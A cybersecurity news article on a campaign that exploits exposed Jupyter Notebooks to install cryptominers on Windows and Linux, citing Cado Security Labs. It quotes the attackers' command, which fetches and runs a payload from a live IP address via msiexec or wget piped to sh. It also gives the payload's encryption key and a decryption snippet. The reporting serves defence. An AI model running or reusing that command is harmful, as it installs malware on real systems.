Cyber Security News

Hackers Attacking Exposed Jupyter Notebooks To Deliver Cryptominer

A novel cryptomining campaign has been identified that exploits misconfigured Jupyter Notebooks, targeting both Windows and Linux systems.

The attack leverages exposed instances of Jupyter Notebook, an interactive application widely used by data scientists containing a Python IDE, to deploy malicious code that installs cryptomining software on compromised systems.

The campaign begins by exploiting unsecured Jupyter environments to execute a command that attempts to install malware through multiple methods.

The initial payload attempts to download either an MSI file for Windows systems or a JavaScript file for Linux environments using the command: “(ipconfig && msiexec /i http://45.130.22.219/py0217.msi) || (wget -q -O- http://45.130.22.219/py0217.js|sh)”

Analysts at Cado Security Labs identified this attack through their honeypot systems, noting that the campaign represents a new vector for cryptomining attacks that hasn’t been previously reported, despite sharing similarities with earlier campaigns targeting Ivanti Connect Secure and Korean web servers.

When targeting Windows systems, the attack downloads an MSI installer containing a 64-bit Windows executable named “Binary.freedllbinary.”

This binary loads a secondary payload called “java.exe” which is stored in c:\ProgramData. Despite its name, “java.exe” is actually a malicious binary packed with UPX that retrieves an encrypted blob called “x2.dat” from various repositories including Github, Launchpad, and Gitee.

Attack Chain

The attackers employ sophisticated encryption techniques to hide their payloads.

The “x2.dat” file is encrypted with ChaCha20 using the nonce “aQFabieiNxCjk6ygb1X61HpjGfSKq4zH” and the key “AZIzJi2WxU0G” before being compressed with zlib.

The code to decrypt this payload is as follows:-

from Crypto.Cipher import ChaCha20
import zlib
key = b' '
nonce = b' '
with open('', 'rb') as f:
    ciphertext = f.read()
cipher = ChaCha20.new(key=key, nonce=nonce)
plaintext = cipher. Decrypt(ciphertext)
# Decompress with zlib after decryption
decompressed_data = zlib.decompress(plaintext)

For Linux systems, the attack downloads a bash script “0217.js” that retrieves two ELF binaries and sets up cronjobs to ensure persistence.

Mining pool (Source – CRADO Security)

The malware targets cryptocurrencies including Monero, Sumokoin, ArQma, and several others, using wallet ID “44Q4cH4jHoAZgyHiYBTU9D7rLsdV82y4EvPRkjgdMQThPLJVB3ZbD9Sc1i84Q9eHYgb9Ze7A3syWV”.

Organizations should implement strong authentication, disable public access to Jupyter instances, and regularly monitor cloud environments for unusual activity to mitigate these attacks.

Are you from SOC/DFIR Teams? – Analyse Malware Incidents & get live Access with ANY.RUN -> Start Now for Free.

Tushar Subhra Dutta

Tushar is a Cyber security content editor with a passion for creating captivating and informative content. With years of experience under his belt in Cyber Security, he is covering Cyber Security News, technology and other news.

Recent Posts

Konni APT Hackers Using Multi-Stage Malware to Attack Organizations

A sophisticated multi-stage malware campaign linked to the North Korean Konni APT group has been…

27 seconds ago

Outlaw Cybergang Attacking Linux Environments Worldwide With New Malware

A previously documented threat actor known as Outlaw (or “Dota”) has resurfaced with an enhanced…

13 minutes ago

Securing Boardroom Buy-In for Your Cybersecurity Budget

Cybersecurity has evolved from a technical concern to a strategic business priority. With escalating regulatory…

27 minutes ago

Hackers Exploit MS Equation Editor Vulnerability to Deploy XLoader Malware

A sophisticated phishing campaign exploiting a nearly 8-year-old Microsoft Office vulnerability to distribute the dangerous…

37 minutes ago

Aligning Cybersecurity with ESG – CISO’s Strategic Guide

In an era where sustainability and ethical governance dominate corporate agendas, cybersecurity has emerged as…

46 minutes ago

Key Breakthroughs from RSA Conference 2025 – Day 1

The first day of the RSA Conference 2025 set the stage for a transformative era…

2 hours ago